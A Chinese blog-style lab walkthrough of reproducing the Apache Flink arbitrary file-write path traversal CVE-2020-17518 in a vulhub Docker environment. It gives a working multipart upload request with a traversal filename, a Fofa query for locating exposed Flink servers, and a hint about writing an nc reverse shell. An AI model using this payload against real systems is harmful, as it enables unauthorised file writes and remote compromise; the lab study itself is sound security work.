前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >实操Apache Flink上传路径遍历(CVE-2020-17518)

实操Apache Flink上传路径遍历(CVE-2020-17518)

作者头像
网e渗透安全部
发布2022-06-15 11:40:46
6900
发布2022-06-15 11:40:46
举报
文章被收录于专栏:白安全组

前言:

Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。

Apache Flink 1.5.1引入了一个REST处理程序,允许您通过恶意修改的HTTP头将上传的文件写入到本地文件系统上的任意

影响版本:

Flink 1.5.1-1.11.2

Fofa语句:

js_name="es2015-polyfills.923637a8e6d276e6f6df.js"

正文:

环境搭建:

使用vulhub搭建,搭建目录:

代码语言:javascript
复制
/vulhub-master/flink/CVE-2020-17518

启动命令:

代码语言:javascript
复制
docker-compose up -d

访问:http://192.168.0.110:8081/#/overview

换成自己的靶机IP即可,访问效果如下:

复现:

很简单的一次复现,我们打开burp

点击到重发器这里,使用重发器,发送下面的包

代码语言:javascript
复制
POST /jars/upload HTTP/1.1
Host: 47.94.172.114:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 181
 
------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"
 
bai
------WebKitFormBoundaryoZ8meKnrrso89R6Y--

//目的是写入一个success文件,自己也可以写入一个nc反弹shell的命令

然后我们点击发送

这里返回虽然是400,但是我们已经成功传进去了

我们到靶机服务器中查看

先使用命令:

代码语言:javascript
复制
docker-compose ps

查看文件名

复制文件名

cve-2020-17518-flink-1

然后命令:

代码语言:javascript
复制
docker exec -it cve-2020-17518-flink-1 bash

可以进入靶机的虚拟系统中,中间就是名字

这里我们就进入了靶机的虚拟系统中,可以执行一些命令了

我们到tmp下查看一下

代码语言:javascript
复制
 ls /tmp

这里可以看到成功上传的文件,代表你已经成功了。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-05-29,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 白安全组 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 前言:
  • 影响版本:
  • 正文:
    • 环境搭建:
      • 复现:
      相关产品与服务
      大数据
      全栈大数据产品,面向海量数据场景,帮助您 “智理无数,心中有数”!
      领券
      问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档